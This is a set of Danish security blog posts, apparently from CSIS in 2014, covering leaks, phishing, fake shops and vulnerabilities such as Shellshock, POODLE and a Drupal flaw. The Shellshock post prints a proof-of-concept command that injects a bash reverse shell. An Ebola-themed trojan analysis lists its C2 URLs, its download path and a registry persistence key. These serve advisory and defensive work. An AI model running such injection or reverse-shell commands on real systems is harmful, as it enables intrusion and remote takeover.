CSIS har her til morgen indsamlet et større datasæt som indeholder en massiv datalækage knyttet til Google's populære e-mail service, Gmail. 

Det samlede antal konti, som indeholder e-mail adresser og klartekst passwords for lidt over 5 millioner konti, ser ud til at stamme fra en anden kilde end Google selv.

CSIS har allerede analyseret de mange data, som i pakket/zippet form, fylder lidt over 50MB. De var lækket flere steder bl.a. et russisk forum.


Vores analyse afslører, at meget tyder på, at disse data er op til 3 år gamle og primært har et geografisk opland i USA og England men der er også bekræftet i massevis af danske Gmail konti. Vi baserer dette på en samlet korrelering med andre datalækager vi har set indenfor de seneste år. Meget kan tyde på at dette stammer fra flere forskellige kilder.

Samtidig blev en tilsvarende omfattende datalækage knyttet til den russiske posttjeneste "mail.ru" også sendt i omløb i forrige uge - også denne indeholdende i millioner af kompromitterede konti. Der er flere ting der tyder på at disse data stammer fra samme kilde som lækkede mail.ru data.

Vi har uploadet de mange data, som naturligvis også indeholder massevis af danske brugere, til vores database, så alle CSIS Threat Detection kunder, automatisk vil blive adviseret. 

Som altid er vores råd, at man - for en sikkerheds skyld - bør skifte sit password, hvis man er bekymret for at det kan være lækket. Vi har i den forbindelse udviklet en gratis tjeneste/service, hvor man selv kan undersøge, om ens e-mail adresse og tilknyttede password er offentligt tilgængeligt. Det kan man gøre via: https://heimdalsecurity.com/en/heartbleed-new-user

Gode råd
Kompromittering af brugernavne og tilhørende passwords er en øget risiko mod din generelle sikkerhed og privacy på nettet.

Nedenstående almindelige brugerfejl kan udgøre en øget risiko for, at din adgangskode bliver stjålet:

- Når du genbruger samme adgangskode på mere end ét website
- Når du downloader software fra internettet fra usikre kilder
- Når du klikker på links i e-mails som f.eks. kan flytte dig ind på en phishing side

Totrinsbekræftelse kan holde uvelkomne gæster ude – selv hvis de har din adgangskode. Af samme grund anbefaler CSIS at man aktiverer 2-faktor authentifikation som også findes i Gmail.

Sørg desuden altid for at vælge et sikkert password og undlad at genbruge det på tværs af forskellige tjenester.

Har man ikke allerede opgraderet sin Apple iPhone/iPad til iOS8, så er her en god grund til at komme ud af starthullet og få det gjort. Og for alle dem, som er fanget på et ældre iDevice, følger her en kedelig nyhed: Apple har nemlig ikke praksis for at lappe ned i deres firmwares og tidligere iOS versioner. Det kan efterlade i tusindvis af Apple devices i skudlinjen for potentielle drive-by scenerier.

En sårbarhed, som optræder i CoreGraphics biblioteket, og relateret til CVE-2014-4377, kan udløse en korruption af hukommelsen og føre til komplet og automatiseret overtagelse af sårbare iDevices. 

Apple CoreGraphics biblioteket indeholder en alvorlig designfejl som ikke tilstrækkeligt validerer input når der parses et PDF XObject, hvilket kan resultere i et heap overflow. En lille del af den allokerede heap memory kan kontrolleres af en angribene payload fra en vilkårlig applikation som gør brug af den fejlbehæftede funktion. 

En angriber kan udføre angrebet ved brug af et særligt udformet PDF dokument. Angrebet kan eksempelvis udføres via klassisk drive-by angreb, som vi kender det fra Microsoft Windows, hvor koden ved indlæsning i Safari, vil afvikles og kompromittere enheden uden yderligere bruger interaktion. 

Følgende iDevices er bekræftet sårbare:

Apple iOS 2.0 -> 7.1.x.
Apple Apple TV 1.0 -> 6.x.

Apple TV brugere bør opgradere til version 7.

Exploitet, som er gjort tilgængeligt på Github, omgår desuden forskellige sikkerhedsmekanismer i iOS, herunder ASLR, DEP og kode signering. En praktisk demonstration er under udvikling.

Vi anbefaler, at alle opgraderer til iOS8 snarest muligt. 

Yderligere oplysninger:
http://blog.binamuse.com/2014/09/coregraphics-memory-corruption.html
http://www.securityfocus.com/bid/69903
https://github.com/feliam/CVE-2014-4377 (PoC)

IT-kriminelle har atter igangsat en massiv phishing kampagne, hvor uønskede e-mails sendes til vilkårlige danske e-mail adresser. Målet er at lokke ofre til dels at opgive brugernavn og password til NemdID og dels sende engangskoder fra NemID kortet til de it-kriminelle. Det kan naturligvis få alvolrige konsekvenser hvis man gør det.

Vi har dækket denne kampagne tidligere, og selv om "kittet" der anvendes i denne kampagne, er forbedret på flere områder, er vi ikke i tvivl om, at det er samme gerningsmænd som stod bag tidligere NemID phishing kampagner, hvor målet også var at lokke folk til at indtaste engangskoder eller uploade billeder af deres NemID kort.

Vi har tidligere advaret omkring dette - og dokumenteret - at tilpas mange, for at gøre dette til en god forretning for de it-kriminelle, hopper på fiskeriet:
https://www.csis.dk/da/csis/blog/4237/

I lighed med tidligere ankommer phishing mails med et semi-dynamisk indhold. Vi har set følgende emnelinje indhold:

Din Nem ID er spaerret
Meget vigtigt!
Du skal laese
Vigtigt!

Et eksempel kan ses herunder:


Vi har blokeret alle disse domæner i CSIS Secure DNS hvorved vi også beskytter alle vores kunder som anvender Heimdal PRO og corporate.

Hovedparten af de websider som anvendes i disse kampagner er WordPress installationer som ikke er blevet installeret korrekt eller som ikke er vedligeholdt.

Kampagnen er nem at genkende idet disse spammails ikke understøtter danske karakterer ligesom man på afsender adressen kan se at de ikke stammer fra NemID. Bemærk endvidere at NemID aldrig ville sende uopfordrede e-mails hvor man beder om sensitive data. Vi anbefaler at man sletter disse e-mails ved modtagelse.

I kølvandet på en ny bølge af phishing e-mails, hvor it-kriminelle forsøger at fiske NemID brugernavne og passwords samt engangskoder, har en anden bande, som er mere raffineret i deres metoder, skudt en anden og ny kampagne i gang. Her fiskes der også efter brugernavne og passwords, men typisk er målet her rettet mod store og mellemstore e-handel butikker. Det kan blive et nyt og voksende problem ...

CSIS har efterforsket en stribe hændelser, hvor it-kriminelle ved brug af forskellige kanaler, har lokket ofre ind på forfalskede websider der imiterer store og mellemstore ehandel butikker, hvor de via transparent indhold høster login data.

Man in the Middle Proxy phishing
Og det snedige er at de forfalskede websider trækker indholdet fra de legitime sider og så ligger sig som en proxy ovenpå siden. På almindeligt dansk betyder det at brugeren faktisk logger korrekt ind på e-handels butikken men samtidig kompromitterer sin konto så de it-kriminelle kan handle varer fra ofrets konto.

Listen over mål er støt voksende og spænder hen og over flere brancher fra online supermarkeder, varehuse, rejsebureauer til tøj og underholdning.

De seneste phishing kampagner er bl.a. blevet spredt via sociale netværk som Facebook og Twitter men også igennem snedige søgemaskine optimeringer.

En af de aktive phishing servere, som fungerer som proxy og altså en slags "Man in The Middle" i disse phishing angreb, kan findes på IP adressen: 109.169.77.189. Den hører hjemme i England hos Milton Keynes Iomart Hosting Limited (AS20860).

Et eksempel er bl.a. Zalando, som udover deres engelske og tyske side, anvender andre sprogmæssigt tilrettede sider. I dette tilfælde subdomænerne:

es.poferri.com
ga.poferri.com

Herunnder et  skærmdump af den forfalskede webside:


Hvem ejer så domænet? Ja, det er i hvertfald ikke Zalando efter whois at dømme:

Domain Name:    POFERRI.COM
Registrar:    BIZCN.COM, INC.
Whois Server:    whois.bizcn.com
Referral URL:    http://www.bizcn.com
Name Server:    F1G1NS1.DNSPOD.NET
Name Server:    F1G1NS2.DNSPOD.NET
Status:    clientDeleteProhibited
Status:    clientTransferProhibited
Updated Date:    26-feb-2014
Creation Date:    26-feb-2014
Expiration Date:    26-feb-2015
>>> Last update of whois database:    Wed, 24 Sep 2014 12:28:36 UTC <<<

Vi har allerede blokeret talrige domæner som er knyttet til disse kampagner i CSIS Secure DNS. Derved kan alle vores kunder af Heimdal PRO og corporate også vide sig sikre, idet vi blokerer adgang til det uønskede indhold.

Vi har naturligvis kontaktet de berørte firmaer, som er mål for denne phishing kampagne, og har i den forbindelse medvirket til at migrere truslen.

Der er fundet en ekstremt alvorlig fejl i måden hvorpå Bash under UNIX/Linux evaluerer særligt udformede variabler. En angriber kan fra et eksternt ståsted misbruge dette til at omgå restriktioner og afvikle shell kommandoer på et sårbart system. Et større antal services og applikationer samt Debian og andre Linux distributioner, er sårbare overfor eksterne angreb og er i risiko for komplet systemkompromittering.

Hvad er bash?
Bash er sandsynligvis det mest anvendte værktøj under Linux. Det blev skabt i 1980 og har hen over tid udvilket sig fra at være en simpel terminal baseret kommando fortolker til at have massevis af funktionalitet og anvendelsesmuligheder (http://en.wikipedia.org/wiki/Bash_%28Unix_shell%29).

Sårbarheden har en grad af alvor, som kaster den ud i næsten samme kategori som Heartbleed. Den har fået tildelt CVE-ID: CVE-2014-6271 ("remote code execution through bash") og optræder i svært mange services og applikationer. Den er tilmed triviel at misbruge. Der er allerede Proof of Concept (PoC) kode i omløb, hvilket bringer denne sårbarhed i klassen "svært kritisk".

Proof of Concept
Et eksempel, som kan anvendes til at teste sårbarhedens eksistens via cgi-bin (vil spawne en shell lyttende på TCP port 55555), findes herunder:

$ env test='() { ignored;};/bin/bash -i >& /dev/tcp/127.0.0.1/55555
0>&1' bash -c "pwd"

De oplagte angrebsvektorer skønnes at være over HTTP og via forskellige CGI funktioner samt særlige implementeringer af OpenSSH.

Der arbejdes fra flere sider på at integrere et modul til Metasploit. Det kan ej heller udelukkes at denne svaghed også vil blive misbrugt i selv-replikerende kode. Det forlyder, at den officielle titel på denne sårbarhed kan blive "shellshock".

Anbefalinger
CSIS anbefaler, at man patcher med det samme, eller som minimum tager skridt til at migrere denne svaghed. Det kan bl.a. ske ved erstatte bash med en anden/alternativ shell, begrænse adgang til sårbare services, eller filtre input til sårbare services.

Udover et større antal populære operativ systemer og software pakker, så findes denne sårbarhed også i flere embedded devices samt trådløse routere.

Svagheden er fundet af Stephane Chazelas.

Yderligere oplysninger:
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
http://pastebin.com/166f8Rjx (PoC)

CSIS har hen over de seneste uger monitoreret en sværm af automatiserede script injektioner som gennemføres mod sårbare webservere.

Formålet er at lokke ofre, fra en legitim webside og ind på en fupbutik, hvorfra der bl.a. tilbydes billige Nike AIR løbesko til langt under halvdelen af markedsprisen. Der er naturligvis tale om decideret svindel og man skal holde sig langt væk fra den slags tilbud, som med god grund lyder for godt til at være sandt.

Den pågældende bølge er primært rettet mod ældre ASP installationer og er tilmed sprogtilrettet. Den rammer, udover Danmark, også lande som Sverige, Tyskland, Norge, Finland og Østrig. Ved siden af ASP angribes også populære software pakker som Joomla og WordPress samt - og ikke mindst - tilknyttede plugins.

Nike AIR er blot en del af en større kampagne, hvor naive brugere skal lokkes til at købe asiatisk producerede kopivarer. Udover Nike tilbyder samme bagmænd nemlig også billige varer fra bl.a. Gucci og ECCO. Gucci kampagnen injektes på lignende måde, som Nike AIR kampagnen, og kan genkendes ved at der oprettes en underside med navnet "gucci2014.html", mens ECCO kampagnen gør brug af "ecco-sko-børn-udsalg.html"

ECCO
Et eksempel på en typisk fup butik, som er aktiv netop nu, findes herunder:

Domænet er strippet for whois oplysninger ved brug af Whoisprotection.cc og serverne er fysisk placeret i Kina:

Et udsnit over legitime danske websider, som ufrivilligt har fået indlejret de skadelige scripts eller referencer, og som dermed tvinger deres besøgende videre til svindelbutikker, er samlet herunder:

rejseplanen.dk *
maegleren.dk
mtgulve.dk
jzz.dk
copenhagen-sc.dk
fashionvictim.dk
kirkplusmaarbjerg.dk
dhic.dk
hvs-info.dk
tobiscafe.dk
markussen-is.dk
dknorthved.dk
emiliana.dk
jacobrisgaard.com
kristinas-hudpleje.dk
flytlie.dk
siforellana.dk
jamesil.dk
footflex.dk

[..]

Hos rejseplanen.dk er det en underside, der tilsyneladende ukritisk tillader kommentarer, i deres blogpost funktion. Bemærk, at der her, i modsætning til andre tilsvarende eksempler ikke er tale om live script injektion men blog posts, som naturligvis kan være slemt nok, men ikke så alvorligt som regulære script injektioner.

Udover at flytte besøgende direkte videre til fupbutikken anvendes også URL-forkortere, som f.eks. bit.ly samt simpel script obfuskering.

De domæner, som er mest aktive netop nu, og som alle er blevet blokeret i CSIS Secure DNS, omfatter eksempelvis:

bestbag-2014.com
js-jpshop.com
myjpstore.com

Domænerne oversættes bl.a. til IP adressen 64.235.47.169, hvor det nemt afsløres, at samme server er rede for massevis af fup domæner.

Et lille udsnit herunder (mellemrum indlagt af CSIS)

87 bag.net
bv bag.net
bv sbag.net
lv- bag.net
87 bagss.net
20 13-bag.net
fa ke-brand.net
ch romehearts-sale.com
sh ockmarketing.com
sa le-sshop.com
tra de-bag.com
js- jpshop.com
ba gs90bag.com
ba gfaves.com

[..]

CSIS blokerer løbende disse domæner i CSIS Secure DNS og vil generelt advare om at handle i disse butikker. Enten modtager man ingenting når man handler disse steder eller også modtager man kopivarer af lav kvalitet.

Den yderst populære Facebook side "afbudsrejser" er blevet hacket.

Siden har 186.380 Facebook følgere/synes godt om, og det kan medvirke til at mange af de kampagner der distribueres derfra, opnår en hurtig viral effekt. Det øger naturligvis også markedsværdien for Facebook siden på det sorte marked.

Det meste af det uønskede indhold, som pt. deles på Afbudsrejser, henviser til websiden iucn.ml.


Det pågældende domæne ligner klassisk blackhat affiliate aktivitet, men der kan være malware aktivitet. Nu er i advaret. Vi har blokeret domænet i CSIS Secure DNS og Heimdal PRO og Corporate.

Vi analyserer på nuværende tidspunkt det indhold, som leveres via disse websider og vil opdatere denne side løbende.

Massiv Rayban kampagne på Facebook

Facebook anvendes som platform til at spamme brugere med links til kinesiske fup- og svindel butikker.

Både decideret falske Facebook profiler, og hackede Facebook konti, spreder i disse dage massive reklamer for Rayban solbriller.

Den pågældende reklame lokker modtageren ind på en fupbutik, hvor der gives omend rigtig god rabat på solbriller fra Rayban. 

I skrivende stund er det uklart om der reelt afsendes solbriller fra butikkerne, eller om fupbutikkerne blot løber med pengene. Faktum er at prisen på disse solbriller, er så langt under almindelig udsalgspris, at vi antager at der er tale om kopivarer, hvis de da overhovedet afsendes.

Kampagnen spreder sig kraftigt på Facebook, og reklamer for de tvivlsomme produlkter, postes både til privat personer, såvel som i grupper. Vi har set i tusindvis af opslag knyttet til denne kampagne.

Herunder et skærmdump af en typisk Facebook post, hvor venner og bekendte "tagges" og derigennem ufrivilligt hjælper til at sprede reklamerne.

Reklamen peger på en webshop, som findes på domænet:

eu-raybanoutlet.com

Et skærmdump af fupbutikken herunder:

Det pågældende domæne peger på en server hostet i Beijing, Kina på IP adressen: 109.202.102.216. Samme server indeholder - ikke overaskende nok - en sværm af tilsvarnende fupbutikker som, udover at sælge Rayban briller, også sælger stribevis af andre produkter (mellemrum indlagt af CSIS):

FASHION BUY-UK.COM
LONGCHA MPSALE-FR.COM
OAKLEYH UT-UK.COM
OAKLEYS HOPPE-NO.COM
OAKLEYS TORM-UK.COM
RAYBANH UT-HOLLAND.COM
RAYBANO NLINE-EU.COM
RAYBANS -EU.COM
RAYBANT AG-UK.COM

[..]

Også herhjemme i vores eget toplevel findes der butikker som åbenlyst sælger Rayban kopivarer (mellemrum indlagt af CSIS):

rayban solbrillerudsalg.dk
rayban -solbriller.dk

Vi har blokeret de mange domæner i CSIS Secure DNS under kategorien spam/scam og med beskrivelsen fupbutikker. Samme beskyttelse tilbydes således også for alle Heimdal PRO og Corporate kunder. Heimdal findes også i en gratis udgave som kan hentes på https://heimdalsecurity.com

SSL er designet til formålet at sikre data i transport hen over nettet. I traditionel webtrafik også kendt som "HTTP" er det SSL og TLS som giver os "HTTPS", men protokolen anvendes også i applikationer. TLSv1.1 og TLSv1.2 er nyere og har i dag - i modsætning til SSL2 og SSL3 fuld understøttelse og support. Langt de fleste browsere, som er frigivet i 2014, understøtter TLS.

Som vi allerede anoncerede i går er der fundet en kritisk sårbarhed i SSL3 (CVE-2014-3566). Selv om SSL3 er ganske identisk med TLSv1.0, så adskiller de sig alligevel ved at to protokoller er anderledes, og det er i disse, at dette problemet introduceres.

SSL3 har tidligere haft sikkerhedsproblemer og mange husker måske "BEAST" som faktisk aldrig blev korrigeret, men i stedet blev løst ved at migrere services og applikationer til TLS 1.1/2, eller alternativt gør brug af en stream cipher som RC4 som dog også er fejlbehæftet.

"POODLE" adskiller sig fra BEAST på flere måder, men har alligevel flere ligheder. I Poodle åbnes nemlig også op for klassiske "Man in The Middle" (MiTM) angreb, eller gør det muligt at dekryptere dele af den krypterede traffic ved at injekte data i SSL3 data strømmen. Angrebet åbner mulighed for at dekryptere 1 byte ad gangen. Ved tilstrækkelig, og vedholdende angreb, er det således muligt at knække krypteringen og læse i SSL3 trafikken.


CSIS anbefaler, at man sender SSL3 på pension, og i stedet migrere sine servere og applikationer til at understøtte TLS1.0.

Kort sagt:
- Support TLS_FALLBACK_SCSV
- Deaktiver SSL3.0

Man kan teste om en service gør brug af SSL3 ved at anvende følgende kommando: (forudsætter at man har openssl installeret):
openssl s_client -ssl3 -connect [IP adresse / domæne]:443.

En automatiseret test kan også findes hos Qualys på adressen:
https://www.ssllabs.com/. 

Apache er den mest anvendte webserver software og kan let modificere så SSL2 og SSL3 deaktivere. Man skal blot tilføje:
"SSLProtocol All -SSLv2 -SSLv3" til konfigurationen.

I følge Cloudflare er det et mininum af klienter som stadig er afhængige af SSL3. Eksempelvis understøtter kun 0.09% af deres besøgende SSL3, så det er opløftende: https://blog.cloudflare.com/sslv3-support-disabled-by-default-due-to-vulnerability/

Yderligere oplysninger:
https://www.openssl.org/~bodo/ssl-poodle.pdf
http://googleonlinesecurity.blogspot.dk/2014/10/this-poodle-bites-exploiting-ssl-30.html
https://access.redhat.com/articles/1232123

Sværmen af yderst kritiske sårbarheder synes ingen ende at tage. Et af de mest udbredte og populære CMS (Content Management Systemer) er ramt af en yderst kritisk svaghed som gør det muligt for en anonym angriber at overtage kontrollen med webserveren.

Alle Drupal installationer skal med det samme opgraderes til version 7.32. Der er fundet en yderst kritisk SQL injektion sårbarhed i det populære CMS, som gør det muligt for en person, fra eksternt ståsted, at kompromittere sårbare installationer.

Drupal er et af verdens mest udbredte open source CMS'er og er kernen i hele 12% af verdens top 100.000 websites. En mere detaljeret beskrivelse af Drupal kan findes på Wikipedia: http://da.wikipedia.org/wiki/Drupal


Sårbarheden introduceres i et database abstraction API, som ironisk nok skal sikre, at forespørglser mod databasen bliver saniteret for at forhindre SQL ijektion. Igennem netop dette API er det muligt for en angriber at sende særligt udformede anmodninger, som kan resultere i arbitrær SQL eksekvering. Angreb kan føre til rettighedseskalering, arbitrær PHP eksekvering m.v. Resultatet, er som før nævnt, kompromittering af webserveren.

Den pågældende sårbarhed har fået tildelt CVE-ID: CVE-2014-3704 og berører alle versioner af Drupal fra version 7.0 og tidligere end version 7.32. Drupal regner også med at frigive en opdatering til Drupal 6 core, men det er uvist om det er relateret.

Opdatér nu
CSIS anbefaler, at alle opgraderer til version 7.32 af Drupal. Hvis dette, af forskellige årsager og hensyn, ikke er en mulighed, er der publiceret et patch som kan hentes her: https://www.drupal.org/files/issues/SA-CORE-2014-005-D7.patch

Yderligere oplysninger:
https://www.drupal.org/SA-CORE-2014-005
https://groups.drupal.org/node/445893

I løbet af de seneste to uger har vi set en bølge af Facebook sider tilhørende virksomheder, organisationer og kendisser blive hacket. Formålet har været det samme hver eneste gang. At poste uønskede opslag, så sidens følgere blev eksponeret for indholdet. Samtidig har de websider, som der er blevet gjort reklame for, været knyttet til en blackhat affiliate kampagne. Her er der bl.a. blevet gennemført clickjacking.

Indtil i aften var det os uklart hvordan det lykkedes de it-kriminelle at opnå adgang til de mange profiler indtil vi fandt Facebook app'en "Get Verified". Selv om alt ved denne app lugter af svindel er det desværre lykkedes bagmændene at fiske massevis af brugernavne og passwords til populære Facebook sider. Vi har medtaget et skærmdump af den pågældende app herunder.


Bemærk, at den pågældende side lokker med at indehaveren kan validere sit ejerskab og samtidig få adgang til access logs. Det er naturligvis ikke tilfældet men derimod den første deciderede phishing kampagne som florerer på Facebook. Som det fremgår af det vedhæftede skærmdump skal man nemlig opgive Navn, E-mail eller telefon samt passwords og URL på ens Facebook side. Med de data i hænderne kan de it-kriminelle fint logge ind og poste præcist de beskeder de ønsker.

KIMS, Afbudsrejser, Kræftens bekæmpelse ...
Vi har en begrundet mistanke om at det netop er på denne måde at flere større Facebook sider tilhørende virksomheder og kendisser er blevet kompromitteret henover den seneste måned. Et eksempel er Afbudsrejser som vi tidligere har blogget omkring: https://www.csis.dk/da/csis/blog/4471/

Da der i flere tilfælde er tale om virksomheder med særdeles mange følgere, så når disse kampagner hurtigt ud til rigtigt mange mennesker, som så samtidig bringer sig selv i fare for at blive det næste offer.

Koden i app'en gør brug af en IFRAME som trækker indhold fra: https://gollf2sh.dating/v1/

Samme side indsamler de data som indtastes og er hostet hos 1&1 Internet AG i Tyskland.

Vi har blokeret flere end 15 domæner relateret til denne kampagne, og mens vi analyserer dette spredes den kraftigt blandt naive Facebook brugere. Alle CSIS Secure DNS kunder er beskyttet ligesom Heimdal PRO og corporate vil være skærmet mod denne og fremtidige kampagner.

Vores råd er at holde sig væk fra "Get Verified" og generelt opføre sig på samme måde som når man modtager uønskede e-mail som fisker efter brugernavne og passwords.

Tak til vores kollegaer på Facebook fællessk,abet "Undgå virus og spam" som pegede os i retning af denne kampagne.

Vi har uploadet indholdet af gollf2sh.dating til Pastebin:
http://pastebin.com/sgvmmsjH

Opnå 40 procent rabat på Heimdal og støt samtidig Knæk Cancer!
CSIS Security Group A/S donerede i går 10.000 kroner til Knæk Cancer indsamlingen på TV2, men det stopper ikke der! Vi har i samarbejde med Heimdal Security etableret en kampagne, som kører en uge fra i dag, hvor du ved køb af Heimdal Security Agent PRO (private) eller corporate (ideelt for virksomheder) opnår ikke mindre end 40% i rabat. Og det bedste er, at overskuddet går ubeskåret til Knæk Cancer indsamlingen.

Hvorfor vælge Heimdal?
Heimdal forhindrer alle former for hackerangreb , når du handler på internettet, surfer på Facebook, bruger netbank, læser e-mails osv. I alle disse situationer er din pc sårbar på grund af ikke-opdaterede programmer. Heimdal sørger for det og med PRO udgaver modtager du tilmed flere lag ekstra beskyttelse som fungerer sammen med dit antivirus program. Med Heimdal PRO blokerer vi bl.a. for fjendtlige websider, phishing, BOTnets, svindel på Facebook og andet uønsket indhold samtidig med at vi detekterer de mest avancerede netbanktyve som rammer Danmark. Heimdal er det ideele supplement til antivirus. Og vigtigst: du støtter et godt formål og opnår højere sikkerhed på din PC!

Sådan støtter du og opnår rabtten
For at støtte det gode formål og samtidig opnå den gode rabat skal du blot besøge Heimdals hjemmeside på adressen: https://heimdalsecurity.com. Her kan du også læse mere om hvad du opnår af forbedringer og yderligere sikkerhed når du vælger Heimdal PRO. Når du foretager købet skal du blot indtaste rabatkoden: "knaekcancer". Derved opnår du din rabat og støtter formålet. Klik på logoet herunder for at gå direkte til online køb af Heimdal Security PRO:

IT-kriminelle misbruger den frygtede Ebola virus og udbrud i Afrika til at sprede malware.

Et eksempel er domænet:
ebolawarnings.com

Fra denne webside lokkes med et alarm system, som kan advisere brugeren omkring Ebola udbrud i nærområdet. Der er naturligvis - og ikke helt overraskende - tale om en trojansk hest, som ved kørsel, vil droppe skadelig kode til systemet. Vi har naturligvis af samme årsag blokeret domænet i CSIS Secure DNS og beskytter derved også brugere af Heimdal PRO og corporate.


Hvis den skadelige kode køres vil den kommunikere tilbage til sin C&C server, hvor den bl.a. indrapporterer mac adressen på den nyfødte zombie. Denne funktion ses tidlig af den dekompilerede kode:

public object getMacAddress()
{
object obj1;
NetworkInterface[] interfaceArray1;
interfaceArray1 = NetworkInterface.GetAllNetworkInterfaces();
return interfaceArray1[0].GetPhysicalAddress().ToString();
}

Data sendes med en HTTP post til: (mellemrum indlagt af CSIS)

ebola.events

En komplet liste herunder:

http://ebola.events/alert-check.php?zip=
http://ebola.events/register.php?mac=
http://ebola.events/state.php

I næste fase downloader den supplerende malware fra:

www.comarch14fast.com

Med følgende HTTP GET:
/download.php?kHl9dWo=

Den kontakter endvidere:

www.stsunsetwest.com
www.fglasspeast.com

For at sikre at koden aktiveres efter en genstart af systemet oprettes en runas værdi i registeringsdatabasen:
HKEY_USERSSoftwareMicrosoftWindowsCurrentVersionRun Ebola EWS

Hovedkomponenten droppes til:
[%bruger konto%]AppDataLocalEbola Early Warning System Official Installer.exe

Den skadelig kode opnår kun begrænset antivirus detektion:

Bkav     Nothing FOUND
MicroWorld-eScan     Nothing FOUND
nProtect     Trojan.GenericKD.1943863
CMC     Nothing FOUND
CAT-QuickHeal     Nothing FOUND
McAfee     Nothing FOUND
Malwarebytes     Trojan.MSIL
AegisLab     Nothing FOUND
K7AntiVirus     Nothing FOUND
K7GW     Nothing FOUND
TheHacker     Nothing FOUND
NANO-Antivirus     Trojan.Win32.KeyLogger.dbjjal
F-Prot     Nothing FOUND
Symantec     Nothing FOUND
Norman     Nothing FOUND
TotalDefense     Nothing FOUND
TrendMicro-HouseCall     Nothing FOUND
Avast     Nothing FOUND
ClamAV     Nothing FOUND
Kaspersky     Nothing FOUND
BitDefender     Trojan.GenericKD.1943863
Agnitum     Nothing FOUND
ViRobot     Nothing FOUND
Tencent     Nothing FOUND
Ad-Aware     Trojan.GenericKD.1943863
Emsisoft     Trojan.GenericKD.1943863 (B)
Comodo     Nothing FOUND
F-Secure     Trojan.GenericKD.1943863
DrWeb     Nothing FOUND
Zillya     Nothing FOUND
TrendMicro     Nothing FOUND
McAfee-GW-Edition     Nothing FOUND
Sophos     Nothing FOUND
Cyren     Nothing FOUND
Jiangmin     Nothing FOUND
Avira     Nothing FOUND
Antiy-AVL     Nothing FOUND
Kingsoft     Nothing FOUND
Microsoft     Nothing FOUND
SUPERAntiSpyware     Nothing FOUND
AhnLab-V3     Nothing FOUND
GData     Trojan.GenericKD.1943863
ByteHero     Nothing FOUND
VBA32     Nothing FOUND
AVware     Nothing FOUND
Zoner     Nothing FOUND
ESET-NOD32     Nothing FOUND
Rising     Nothing FOUND
Ikarus     Trojan.SuspectCRC
Fortinet     MSIL/Agent.ABJL!tr
AVG     Nothing FOUND
Baidu-International     Nothing FOUND
Qihoo-360     Nothing FOUND

MD5 hash: b77634abea3966d2ee5c6dfd0115c6a1

De to danske it-sikkerhedsfirmaer Comendo og CSIS danner nu fælles front i kampen mod it-kriminalitet indgår derfor et strategisk samarbejde. Aftalen sigter på, at de to parter ved fælles hjælp kan begrænse og standse it-kriminalitet rettet mod danske virksomheder.

Danske virksomheder bliver jævnligt bombarderet med spammails, hvor it-kriminelle f.eks. forsøger at franarre medarbejdere deres brugernavn, adgangskode, kreditkort- eller netbankoplysninger. Det vil it-sikkerhedsvirksomhederne Comendo og CSIS sætte en stopper for, og de to parter indgår derfor et strategisk samarbejde, der skal begrænse og standse stigningen i angreb rettet mod Danmark.

– Som den største udbyder af cloudbaseret e-mail-sikkerhed i Danmark ser vi en kraftig vækst i phishing-angreb på danske virksomheder. Det sker fx ved, at medarbejdere får tilsendt e-mails, som lokker én til at sende oplysninger eller besøge forfalskede hjemmesider med malware. Med samarbejdet med CSIS vil vi kunne tilbyde kunder en væsentligt reduceret risiko for at blive udsat for disse phishing og spear-phishing angreb, siger Troels Lind, adm. direktør i Comendo A/S.

Flere specialiserede løsninger
Det nye samarbejde indebærer også, at Comendo og CSIS vil kunne tilbyde deres respektive brugere og kunder teknologier og services fra hinanden. Comendos kunder kan nu indgå aftaler på blandt andet security audits og forensic-analyser fra CSIS, og vælge web-sikkerhedsløsningen Secure DNS, som beskytter over 200.000 brugere i danske og internationale virksomheder ved dagligt at blokere for ca. 900.000 skadelige DNS-opslag. Videre kan Comendo fremover tilbyde CSIS’ nyhedsbrev Platinum Alert Service. Med en større salgsorganisation kan vi forhåbenligt i fællesskab nå ud til flere kunder og tilbyde it-sikkerhedsløsninger..

CSIS er et udviklings- og researchhus som lever af at udvikle egne it-sikkerhedskoncepter og teknologier som tilbydes kunder i det meste af Europa. Firmaet beskæftiger omkring 35 medarbejdere og har hovedsæde i København og kontor i Skanderborg.

Webcams var sidste år øverst på danskernes julegave liste. At mange af sådanne er installeret i danske hjem kan næppe overraske nogen, men desværre kan det overraske - på trods af talrige advarsler i pressen, hvor mange der blot pakker webcam'et ud og ukritisk installerer det. Det kan give andre samme adgang til at følge med i det private rum som indehaveren af webcam'et idet hovedparten leveres med fabriksindstillinger og et standard password.

Det faktum, at så mange webcams er åbne fra internettet, og kan tilgåes med standard passwords, dokumenteres nu af websiden: insecam.com.

599 webcams streames fra Danmark
på denne side kan man se en oversigt over "usikre" webcams i Danmark og samtidig følge med i begivenhederne live. I skrivende stund er der 599 webcams tilgængelige i Danmark. Åbenlyst er flere af disse ikke tilsigtet at skulle kunne tilgås og derved følge med i hvad der foregår i private hjem, skoler, kollegier, gymnastik haller osv. Vi har flere gange været ude og advare omkring dette.


Det er vigtigt at understrege, at det IKKE er lovligt at tilgå dette udstyr, også selvom det gør brug af standard/default brugernavn/password. At kunne logge ind på dette udstyr gør det ikke nødvendigvis lovligt. Vi overvejer om den pågældende webside, som gør disse streams tilgængelige, skal blokeres i CSIS Secure DNS.

Generelle råd når du køber og vil installere et webcam:
1) Læs manualen
2) Skift password
3) Sørg for at opdatere firmware/software løbende
4) Begræns adgang til udstyret fra internettet

Nej! Lad det være sagt med det samme: Macaulay Culkin er ikke fundet død. Der er tale om endnu en kendis dødshoax og folk som ønsker at tjene penge på den slags platte og uetiske stunts.

Nyheden om skuespillere, rockstjener og andre kendisser dødsfald er et super effektivt fluepapir. Men pas på. De mange falske nyheder kan føre naive brugere i hænderne på decideret malware. Ofte misbryges disse virale kampagner nemlig til at lokke folk til for derefter at forsøge at plante malware på systemet.

Den seneste bølge af påstande om et kendis dødsfald tilfalder Macaulay Culkin som nok mest er kendt fra filmene "Alene Hjemme". En klassiker ved juletid som også ofte sendes i dansk tv. Beskeden spredes igennem et opslag på Facebook:

Inden det kommer så vidt har ofret besøgt en webside som formentligt er oprettet specifikt til formålet:
http://msnbc.website/macaulay-culkin-found-dead-at-age-34.html

Indholdet af denne webside er vist herunder:

Formålet med denne webside er at lokke folk til at sprede den falske nyhed, hvorved kampagnen opnår en viral effelt. Det betyder også at personen bag denne webside og rygte tjener penger på de mange kliks som genereres, idet der også vises reklamer som ved kliks giver et kontant kickback.


<span class='st_facebook_hcount' displayText='Facebook'></span>
